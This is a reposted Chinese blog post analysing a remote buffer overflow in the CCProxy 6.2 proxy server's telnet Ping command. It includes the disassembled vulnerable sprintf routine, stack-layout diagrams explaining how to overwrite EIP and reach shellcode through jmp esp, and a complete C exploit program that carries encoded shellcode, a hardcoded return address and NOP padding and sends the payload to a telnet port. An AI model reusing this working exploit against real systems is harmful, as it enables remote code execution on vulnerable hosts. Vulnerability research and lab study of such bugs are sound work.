[转自luoluo's blog]CCProxy远程缓冲区溢出分析

最新推荐文章于 2023-07-31 10:38:42 发布
最新推荐文章于 2023-07-31 10:38:42 发布
阅读量1.9k 收藏
点赞数
分类专栏: 技术文章 文章标签: blog buffer socket byte 代理服务器软件 服务器软件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/forever_FST/article/details/286279
版权 
CCProxy远程缓冲区溢出分析

luoluo [luoluonet@hotmail.com]

CCProxy的缓冲区溢出攻击代码早已公布,但是我并没有能找到漏洞的相关说明,以下就对
这个简单的缓冲区溢出漏洞作简要分析。偶水平很菜,加上糟糕的文字,错误和不足处,
请各位指教,感激不尽。

测试环境:windows2003 + CCProxy 6.2

CCProxy是一款轻量级的代理服务器软件,该服务器软件提供了远程telnet功能,telnet进
去后可以执行简单的命令,其中的Ping(P)命令的参数如果提交过长的字符串的话,就会造
成缓冲区溢出,攻击者可以利用这个漏洞在远程主机上执行任意代码。

该漏洞主要是由于在处理Ping命令的结果回显数据时,使用sprintf函数格式化字符串,该
函数没有边界检查,导致溢出从而可以改变程序流程执行任意代码。

漏洞代码:

_text:00430300 sub_0_430300    proc near               ; CODE XREF: sub_0_426B20+20p
_text:00430300 
_text:00430300 var_468         = dword ptr -468h
_text:00430300 s               = dword ptr -464h
_text:00430300 var_458         = dword ptr -458h
_text:00430300 var_454         = dword ptr -454h
_text:00430300 var_450         = dword ptr -450h
_text:00430300 var_44C         = dword ptr -44Ch
_text:00430300 var_448         = byte ptr -448h
_text:00430300 var_438         = dword ptr -438h
_text:00430300 in              = in_addr ptr -434h
_text:00430300 var_430         = dword ptr -430h
_text:00430300 var_42C         = byte ptr -42Ch
_text:00430300 var_428         = byte ptr -428h
_text:00430300 var_418         = byte ptr -418h
_text:00430300 buf             = byte ptr -414h
_text:00430300 var_404         = byte ptr -404h
_text:00430300 var_403         = byte ptr -403h
_text:00430300 var_34          = dword ptr -34h
_text:00430300 var_20          = dword ptr -20h
_text:00430300 name            = dword ptr -4
_text:00430300 arg_8           = dword ptr  0Ch
_text:00430300 
_text:00430300                 sub     esp, 430h
_text:00430306                 push    ebx
_text:00430307                 push    ebp
_text:00430308                 mov     ebp, ecx
_text:0043030A                 push    esi
_text:0043030B                 push    edi
_text:0043030C                 mov     ecx, 100h
_text:00430311                 lea     ebx, [ebp+8]
_text:00430314                 mov     byte ptr [ebp+1008h], 0
_text:0043031B                 lea     edi, [esp+440h+var_403]
_text:0043031F                 push    1               ; protocol
_text:00430321                 mov     byte ptr [ebx], 0
_text:00430324                 mov     al, byte_0_47B338
_text:00430329                 mov     [esp+444h+var_404], al
_text:0043032D                 xor     eax, eax
_text:0043032F                 repe stosd     // 缓冲区清空 400h = 1024,调试程
序时发现这里的缓冲区起始位置比分配的位置后移了一个字节,不知道是什么原因
_text:00430331                 mov     ecx, [esp+444h+arg_8]
_text:00430338                 push    3               ; type
_text:0043033A                 push    2               ; af
_text:0043033C                 mov     [ebp+0], ecx
_text:0043033F                 call    ds:socket
_text:00430345                 cmp     eax, 0FFFFFFFFh
_text:00430348                 mov     [esp+44Ch+var_438], eax
_text:0043034C                 jnz     short loc_0_430367
_text:0043034E                 push    offset aSocket  ; "socket()"
_text:00430353                 mov     ecx, ebp
_text:00430355                 call    sub_0_430710
_text:0043035A                 pop     edi
_text:0043035B                 pop     esi
_text:0043035C                 pop     ebp
_text:0043035D                 pop     ebx
_text:0043035E                 add     esp, 430h
_text:00430364                 retn    0Ch
_text:00430367 ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
_text:00430367 
_text:00430367 loc_0_430367:                           ; CODE XREF: sub_0_430300+4Cj
_text:00430367                 mov     esi, [esp+44Ch+name]
_text:0043036E                 push    esi             ; name
_text:0043036F                 call    ds:gethostbyname
_text:00430375                 test    eax, eax
_text:00430377                 jnz     short loc_0_4303DF
_text:00430379                 push    esi               // 第三个参数,Ping命令的参数
_text:0043037A                 lea     edx, [esp+454h+buf]
_text:0043037E                 push    offset aHostNotFoundS ; "Host not found: %s/r/n"
_text:00430383                 push    edx               // 第一个参数,目标缓冲区
_text:00430384                 call    _sprintf          // 调用sprintf函数  导致溢出
_text:00430389                 lea     edi, [esp+45Ch+buf]
_text:0043038D                 or      ecx, 0FFFFFFFFh
_text:00430390                 xor     eax, eax
_text:00430392                 add     esp, 0Ch
_text:00430395                 repne scasb
_text:00430397                 not     ecx
_text:00430399                 sub     edi, ecx
_text:0043039B                 push    eax             ; flags
_text:0043039C                 mov     esi, edi
_text:0043039E                 mov     edx, ecx
_text:004303A0                 mov     edi, ebx
_text:004303A2                 or      ecx, 0FFFFFFFFh
_text:004303A5                 repne scasb
_text:004303A7                 mov     ecx, edx
_text:004303A9                 dec     edi
_text:004303AA                 shr     ecx, 2
_text:004303AD                 repe movsd
_text:004303AF                 mov     ecx, edx
_text:004303B1                 and     ecx, 3
_text:004303B4                 repe movsb
_text:004303B6                 lea     edi, [esp+454h+buf]
_text:004303BA                 or      ecx, 0FFFFFFFFh
_text:004303BD                 repne scasb
_text:004303BF                 not     ecx
_text:004303C1                 dec     ecx
_text:004303C2                 lea     eax, [esp+454h+buf]
_text:004303C6                 push    ecx             ; len
_text:004303C7                 mov     ecx, [ebp+0]
_text:004303CA                 push    eax             ; buf
_text:004303CB                 push    ecx             ; s
_text:004303CC                 call    ds:send
_text:004303D2                 pop     edi
_text:004303D3                 pop     esi
_text:004303D4                 pop     ebp
_text:004303D5                 pop     ebx
_text:004303D6                 add     esp, 430h
_text:004303DC                 retn    0Ch
_text:004303DF ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?


调用sprintf前当前的堆栈的情况:

+---------+---------+------------------------+------------+----------+---------+--------+
|   esp   |  data   | dst buffer of sprintf  |  4 bytes   |  eip     |  data   |  ebp   |
+---------+---------+------------------------+------------+----------+---------+--------+
                    |<----  1024 bytes   --->|

格式化字符串的长度是16 bytes,只要我们Ping命令的主机名为1016 bytes数据,就可以刚
好覆盖eip,从而改变程序流程,在返回时,esi里存放的地址正好落在一个存放主机名的
buffer拷贝里,可以搜寻系统里的jmp esi的地址作为返回地址来定位shellcode。

如果要用jmp esp来执行shellcode,则麻烦一些,因为在漏洞程序部分使用主机名是一份拷贝,
在前面拷贝时,源缓冲区和目标缓冲相邻,如果主机名大于1024 bytes,大于1024 bytes的部
分会被拷贝的部分填充,所以如果直接把shellcode跟在要用来覆盖eip的地址后面不可行。
但是不是没有办法,因为填充的内容就是源缓冲区的前1024 bytes,而拷贝的长度由源串的长
度决定,可以发送一个长度不小于1024+(len of shellcode)的主机名,并且shellcode填充在
主机名的最前面,这样拷贝时shellcode会被拷贝到目标缓冲区的后面,就可以利用jmp esp来
定位shellcode。

图Copy前:

+-----+------+-----------+--------------+--------------+------+--------------+------
| esp | data | shellcode | filling data | addr jmp esp | nops | filling data | data ...
+-----+------+-----------+--------------+--------------+------+--------------+------
             |<--------   1024 bytes source buffer  --------->|<- start of dst buffer    
                                                              
图Copy后:

--+-----------+--------------+--------------+------+--------------+--------------+--------------+------+-----------+--
..| shellcode | filling data | addr jmp esp | nops |  shellcode   | filling data | addr jmp esp | nops | shellcode |..
--+-----------+--------------+--------------+------+--------------+--------------+--------------+------+-----------+--
  |<--------   1024 bytes source buffer  --------->|<---- start of dst buffer                   |<-- esp when ret
                                                   |<---- hostname buff to be formatted by sprintf


附带一个在win2003上利用jmp esp的简单测试程序(非安全返回):

//-----------------------------------------------------------------
// A test script (jmp esp) for ccproxy 6.22 on win2k3
// and it only opens a cmd window for funny. :)
// and it dosen't return safely, if the cmd window
// was closed, an exception will be thrown out
// and the application will exit.
//
// created by luoluo luoluo_at_hotmail.com
//-----------------------------------------------------------------

#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>

#pragma comment(lib, "ws2_32")

bool send_buff(char *, int);

unsigned char shellcode[] = 
		// decoder
		"/x8B/xC4/x83/xC0/x49/x80/x30/x99"
		"/x83/xC0/x29/x80/x30/x99/x83/xC0/x2E/x80/x30/x99"
		// system("cmd.exe")
		"/x55/x51/x52/x8B/xEC/x83/xEC/x20/x33/xC9"
		"/xC6/x45/xF5/x6D/xC6/x45/xF6/x73"
		"/xC6/x45/xF7/x76/xC6/x45/xF8/x63"
		"/xC6/x45/xF9/x72/xC6/x45/xFA/x74"
		"/xC6/x45/xFB/x2E/xC6/x45/xFC/x64"
		"/xC6/x45/xFD/x6C/xC6/x45/xFE/x6C"
		"/xC6/x45/xFF/x99/x8D/x45/xF5/x50"
		"/xB9/x0D/x85/xE1/x77/xFF/xD1/x8B/xD0"
		"/xC6/x45/xF5/x73/xC6/x45/xF6/x79"
		"/xC6/x45/xF7/x73/xC6/x45/xF8/x74"
		"/xC6/x45/xF9/x65/xC6/x45/xFA/x6D"
		"/xC6/x45/xFB/x99/x8D/x45/xF5/x50"
		"/x52/xB9/xFB/x2D/xE1/x77/xFF/xD1/x8B/xD0"
		"/xC6/x45/xF5/x63/xC6/x45/xF6/x6D"
		"/xC6/x45/xF7/x64/xC6/x45/xF8/x2E"
		"/xC6/x45/xF9/x65/xC6/x45/xFA/x78"
		"/xC6/x45/xFB/x65/xC6/x45/xFC/x99"
		"/x8D/x45/xF5/x50/xFF/xD2/x83/xC4"
		"/x04/x8B/xE5/x5A/x59/x5D";

unsigned char jmp_esp[] = "/x46/x7a/xe1/x77";


unsigned char padding[] = "/x90/x90/x90/x90"
			  "/x90/x90/x90/x90";

void main()
{
	char buff[2048];
	int i;
	int filling_size;
	char buff2send[2048];

	memset(buff, 0, 2048);

	strcpy(buff, "/x90/x90/x90/x90");
	strcat(buff, (const char *)shellcode);
	
	filling_size = 1024 - 4 - strlen((const char *)shellcode) - strlen((const char *)padding) - 4;

	for (i = 0; i < filling_size; i ++)
		strcat(buff, "/x90");

	strcat(buff, (const char *)jmp_esp);
	strcat(buff, (const char *)padding);

	for (i = 0; i < 400; i ++)
		strcat(buff, "/x90");

	memset(buff2send, 0, 2048);
	sprintf(buff2send, "p %s/r/n", buff);

	//---------------------------------------------------
	send_buff(buff2send, strlen(buff2send));
}

bool send_buff(char *buffer, int buff_size) 
{

	WSADATA WSAData;
	SOCKET s;
	SOCKADDR_IN addr_in;
	char recv_buff[4096];
	int bytes_recv = 0;
	int bytes_send = 0;

	//---------------------------------------------------
	if (WSAStartup(MAKEWORD(2, 0), &WSAData) != 0)
	{
		printf("WSAStartup failed./n");
		return false;
	}

	//----------------------------------------------------------
	if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
	{
		printf("socket error./n");
		return false;
	}

	//-----------------------------------------------------------
	addr_in.sin_family = AF_INET;
	addr_in.sin_port = htons(23);
	addr_in.sin_addr.S_un.S_addr = inet_addr("192.168.1.2");

	if (connect(s, (SOCKADDR *)&addr_in, sizeof(addr_in)))
	{
		printf("connect error./n");
		return false;
	}

	//------------------------------------------------------
	memset(recv_buff, 0, 4096);

	bytes_recv = recv(s, recv_buff, 4096, 0);

	if (bytes_recv == SOCKET_ERROR)
	{
		printf("recv error./n");
		return false;
	}
	else if (! bytes_recv)
	{
		printf("connection closed./n");
		return false;
	}

	printf("%d : %s/n", buff_size, recv_buff);

	//----------------------------------------------------------------
	bytes_send = send(s, buffer, buff_size, 0);

	if (bytes_send == SOCKET_ERROR) 
	{
		printf("send error./n");
		return false;
	}

	printf("%d bytes has been sent : %S/n", buff_size, buffer);

	//------------------------------------------
	closesocket(s);
	WSACleanup();
	return true;
}

-----------------EOF-------------------
forever_FST
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
luoluo优化专题-执行计划
08-17
在"luoluo优化专题"中,你可能学到如何解读执行计划,包括分析操作符的顺序、估计的成本和实际的执行时间。通过执行计划,你可以识别性能瓶颈,如慢速的索引、过多的排序或连接操作。优化器会根据统计信息选择最佳...
缓冲区溢出漏洞攻击演示实验
Mr.Buffoon
10-07 9788
实验内容: 分析缓冲区溢出漏洞,利用CCProxy 6.2的这个缓冲区溢出漏洞,利用ping命令向其发送一个长的字符串,溢出局部变量,覆盖RET的位置,从而实现程序跳转到自己想要让其执行的程序上去。   定位RET   寻找跳转指令地址   构造shellcode   定位shellcode存放位置   编写攻击程序 实验环境: 攻击主机:
针对CCProxy 6.2缓冲区溢出
flamingobaby的博客
04-15 1490
溢出对象:CCProxy 6.2 调试工具: WinDbg,pattern.py 实验环境: Windows XP sp1或sp2,kali Linux 漏洞说明: CCProxy在代理Telnet协议时,可以接受 Ping命令 。Ping命令格式:ping hostname\r\n 。 当hostname的长度大于或者等于1010字节时,CCProxy 6.2会发生缓冲区溢出,导致程序...
网络安全实验:CCProxy缓冲区溢出攻击
程哥哥的一亩三分地
04-17 6588
CCProxy缓冲区溢出实验 一.实验环境说明 溢出对象:CCProxy(一款代理服务器软件,支持FTP和Telnet) 调试工具:CDB、WinDbg、OllyDBG、IDA Pro etc 实验环境:VMware Workstation Pro、windows xp sp3(关闭dep)、python3、ActivePerl Windows XP SP3关闭DEP的方法:编辑C:\boot.ini文件,将/noexecute=optin 改为 /execute,重启系统 二.测试CCProxy是否存在漏
CVE漏洞攻击——ccproxy溢出
qq_43840665的博客
04-17 4487
CCProxy6.2溢出漏洞 虚拟机:VirtualBox 6.1.30 操作系统:WindowsXP SP2 主机OS:Microsoft Windows10 CVE编号:CVE-2004-2685 安装共享文件夹 按照下面箭头指向程序,然后再虚拟机设置中自动挂载一个主机的共享文件夹 2. 关闭winxp的DEP 使系统显示C:\boot.ini 修改DEP选项 查询虚拟机IP并连接ccproxy 命令提示符中输入ipconfig可以获得ip地址,或者使用127.0.0.1
CCPROXY漏洞利用
panfengblog
11-02 2071
CCPROXY漏洞利用 CCProxy是一款非常流行的下载量最大的的国产代理服务器软件,其CCProxy 6.2版本存在一个栈溢出漏洞,可以通过此漏洞进行shellcode攻击,以下是学习过程的一个小记录吧 : ) 1.找到并定位溢出点 使用ping命令加一个超长的字符串加一个主机名,代理端会返回Host not found。 当输入的字符串足够长时(比如2000个a),软件就会溢出奔溃,通过二分法尝试,发现ping后最多接1009个字符,第1010字符开始溢出,并且前四字节无用,如下图,当输入
Tao+Analysisi
07-28
陶哲轩的数学分析,是一本很好的数学资源,为英文版教材
BP神经网络的C++实现
04-25
通过对这些特征的分析,BP神经网络可以学习并建立一个模型,用于区分这三种鸢尾花。 C++是一种强类型、静态编译的通用编程语言,以其高效性和灵活性著称。在C++中实现BP神经网络,需要对数据结构、矩阵运算、随机数...
The ART of XSD
01-16
《XSD的艺术》这本书深入浅出地探讨了XML Schema Definition(XSD)这一重要的XML标准。XML Schema,简称为XSD,是用于定义XML文档结构和数据类型的规范,它为XML文档提供了强大的验证机制,确保数据的一致性和准确...
形式化数理逻辑(课件)
05-16
这个领域起源于对逻辑结构的抽象和形式化,旨在建立一种精确的框架,以分析和验证推理的有效性。在形式化数理逻辑中,逻辑不仅仅是关于日常语言中的推理规则,更是一种严谨的数学工具。 首先,我们要理解逻辑的本质...
CCProxy远程溢出漏洞分析
03-04
CCProxy是一个国产的支持HTTP、FTP、Gopher、SOCKS4/5、Telnet、Secure(HTTPS)、News(NNTP)、 RTSP、MMS等代理协议的代理服务器软件。因为其简单易用、界面友好,非常适合在对流量要求不高的网络环境中使用,所以在国内有很多初级的网管喜欢用这个软件。笔者在测试发现CCProxy 6.0版本存在多处缓冲区溢出漏洞,可以导致攻击者远程执行任意代码。
缓冲区溢出攻击.pdf
04-15
介绍linux系统下,gcc编译的c代码如何利用缓冲区溢出修改函数返回地址和参数,实现攻击,含函数栈帧的分析
缓冲区溢出攻击
11-21
缓冲区溢出攻击 在Windows XP平台上,根据CCproxy缓冲区溢出的原理,编程实现向CCproxy发送ping命令,导致CCproxy产生缓冲区溢出
漏洞利用与缓冲区溢出攻击
最新发布
weixin_62304542的博客
07-31 453
漏洞利用与缓冲区溢出攻击
python中的正则表达式
luoluo3664的博客
09-26 797
一、概述 1)正则表达式是一个特殊的字符序列,能帮助你方便的检查一个字符串是否与某模式匹配 2)python1.5开始增加 re 模块,提供Perl风格的正则表达式模式 3)compile函数根据一个模式字符串和可选的正则表达式参数生成一个正则表达式对象,该对象拥有一系列方法用于正则表达式匹配和替换 4)re模块提供了与正则表达式对象方法功能完全一样的函数,这些函数使用一个模式字符串作为它...
PHP用gd库给图片添加水印,php用GD库给图片添加水印
weixin_30679649的博客
03-12 391
php用GD库给图片添加文字水印,整个代码比较简单,DEMO如下:/*打开图片*///1、配置图片路径$src = "aeroplane.jpg";//2、获取图片信息$info = getimagesize($src);//3、获取图片类型$type = image_type_to_extension($info[2], false);//4、在内存中创建一个和我们图像类型一样的图像$func ...
solaris java_Sun Solaris下JAVA以及JSP开发环境的配制小记
weixin_29373959的博客
02-21 85
by luoluo [luoluonet@hotmail.com]2005-11-7本来我没有纪录这些东西的习惯,可是经常的重复性工作让我意识到对于这些技术细节纪录的重要性,让我不至于下次配制时纠缠于同样的问题。Sun Solaris下的JAVA以及JSP开发环境的配制过程和在Windows下或者在Linux下是没有什么区别的,无非是几个环境变量的设置。还是从头说起,首先要下载j2sdk和tomc...
CCProxy缓存区溢出攻击代码
my2005lb的专栏
03-19 2129
针对CCProxy6.2的一个缓存区溢出漏洞(telnet到CCProxy服务器,当执行ping命令主机名输入超过1012字节时),实现Shellcode的代码注入。      #include #include #include #pragma comment (lib,"ws2_32") // jmp esp address of chinese version
网络攻防:ccproxy + war-ftpd 缓冲区溢出攻击详解
szk171848581的专栏
04-24 1969
网络攻防:ccproxy + war-ftpd 缓冲区溢出攻击详解准备工作我的工具ccproxy攻击流程1.测试是否有漏洞1.1启动ccproxy软件1.2 用调试软件ccproxy挂起1.3 测试是否有漏洞2.根据测试结构构造shellcode3.攻击测试war-ftpd 详细演示1.测试是否有漏洞2.根据测试构造shellcode3.攻击测试 准备工作 VM虚拟机,存在漏洞的windows版...
python 天体时角
07-29
- *1* [python 天文坐标系转换](https://blog.csdn.net/luoluo19550418/article/details/88982129)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值